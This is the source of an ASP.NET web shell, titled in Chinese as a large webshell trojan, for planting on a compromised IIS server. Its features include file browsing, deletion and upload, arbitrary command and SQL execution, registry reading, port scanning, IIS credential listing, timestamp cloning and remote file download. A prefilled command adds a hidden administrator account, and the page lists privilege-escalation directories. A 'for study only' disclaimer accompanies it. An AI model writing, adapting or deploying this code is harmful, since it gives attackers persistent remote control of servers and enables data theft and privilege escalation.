<%@ Page Language="C#" ContentType="text/html" validateRequest="false" aspcompat="true"%> <%@ Assembly Name="System.DirectoryServices,Version=2.0.0.0,Culture=neutral,PublicKeyToken=B03F5F7F11D50A3A"%> <%@ Import Namespace="System.IO" %> <%@ import namespace="System.Diagnostics" %> <%@ Import Namespace="Microsoft.Win32" %> <%@ Import Namespace="System.Collections" %> <%@ Import Namespace="System.Net" %> <%@ Import Namespace="System.Data.SqlClient" %> <%@ Import Namespace="System.Threading" %> <%@ Import Namespace="System.Net.Sockets" %> <%@ import Namespace="System.DirectoryServices"%> <%@ Import Namespace="System.Diagnostics" %> <% //-------------------------------Code by sunue-------------------------------- //-------------------------------------------- %> <% string page = Request.QueryString["page"]; string action = Request.QueryString["action"]; string src = Request.QueryString["src"]; %> <% if (action == "del") { Directory.Delete(src,true); string webname = GetWebName(); Response.Redirect(webname + "?page=index&src="+GetParentDir(src));//// } if (action == "deldir") { FileInfo fl = new FileInfo(src); fl.Delete(); string webname = GetWebName(); Response.Redirect(GetParentDir(webname + "?page=index&src=" + src)); } %> <% if (Session["root"] != null) { %>
功能: <% Response.Write("Webshell目录"); %> 基本信息 进程管理 新建文件 新建目录 文件上传 注册表读取 cmd执行 sql执行 端口扫描 iis信息 克隆时间 远程文件下载 登出

提权目录: Program Files Documents PcAnywhere 开始菜单 All Users Serv-u目录I Serv-u目录II Real Sql Server Config Data Temp

盘符浏览: <% String[] drives = Environment.GetLogicalDrives(); for (int i = 0; i < drives.Length; i++) { Response.Write(""+ drives[i]+"" + "    "); } %>
当前路径: <% if (src == null) { Response.Write(Server.MapPath(".")+"\\"); } else Response.Write(src); %>

<% if ((page == "info") && (Session["root"] != null)) { this.LbServerNameC.Text = Server.MachineName; this.LbLangC.Text = Request.UserLanguages[0]; this.LbIpC.Text = Request.UserHostAddress; this.LbBrowerC.Text = Request.UserAgent; this.LbDnsC.Text = Request.UserHostName; this.LbUrlC.Text = Server.MapPath("."); this.LbUrlXdC.Text = Request.Path; this.LbTimeC.Text = DateTime.Now.ToString(); this.Lbversionc.Text = Environment.Version.ToString(); this.LbUserc.Text = Environment.UserName; this.LbBBC.Text = Environment.OSVersion.ToString(); %>











<% } else if ((page == "reg") && (Session["root"] != null)) { %>
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Terminal Server\Wds\rdpwd\Tds\tcpPortNumber
<% } else if ((page == "upload") && (Session["root"] != null)) { %> 保存路径:

<% } else if ((page == "cmd") && (Session["root"] != null)) { %> net user
<% } else if ((page == "sql") && (Session["root"] != null)) { %> .
sasa
net user char char /add & net localgroup administrators char /add
<% } else if (page == "iis" && Session["root"] != null) { %>
IDIIS_USERIIS_PASSDomainPath
<% AdCx(); } else if ((page == "scan") && (Session["root"] != null)) { %> IP:127.0.0.1 port(多端口请用逗号隔开)21,1433,3389
<% } %> <% else if (page == "logout") { Session["root"] = null; Response.Redirect(GetWebName()); %> <% } else if ((page == "clonetime") && (Session["root"] != null)) { %> 要克隆的文件:
被克隆的文件:
<% } else if ((page == "download") && (Session["root"] != null)) { %>
下载地址:http://www.baidu.com/img/logo.gif
保存路径:c:\logo.gif
<% } else if ((page == "newdir") && (Session["root"] != null)) { %> 输入路径和文件夹名称:
<% } else if ((page == "index") && Session["root"] != null) { %> <% if (src == "") { Response.Write("我已经无法再跳上层目录了,请往回走,谢谢!"); } else GetDir(src, src); %> <% } else if ((page == "process") && Session["root"] != null) { ListBoxPro.Items.Clear(); listprocess(); %>
可带参数执行指定程序功能(权限限制):
执行程序(绝对路径):
参数(若无,可不写):
当前进程:

总进程数:
<% } else if ((page == "newfile") && (Session["root"] != null)) { %> c:\char.txt


<% } else if ((action == "edit") && (Session["root"] != null)) { %> <% TextBoxReadDir.Text = src; StreamReader sr = new StreamReader(TextBoxReadDir.Text.ToString(), Encoding.Default); TextBoxFileContent.Text = sr.ReadToEnd(); sr.Close(); %>



<% } else if (action == "rename" && Session["root"] != null) { TextBoxRename.Text = src; TextBoxRenameTo.Text = src; %>
重命名:
为:
<% } if (action == "copy" && (Session["root"] != null)) { TextBoxCopy.Text = src; %>
从:
到:
<% } else if (action == "down" && (Session["root"] != null)) { DownFile(src); %> <% } } else { %>
/*只支持鼠标登录,不可用回车*/

/*警告:此网页木马采用Visual C# 2005 编写,仅供学习研究之用,不得用于非法*/

<% } %>
凝聚科技专用AspX大马 By:凝聚科技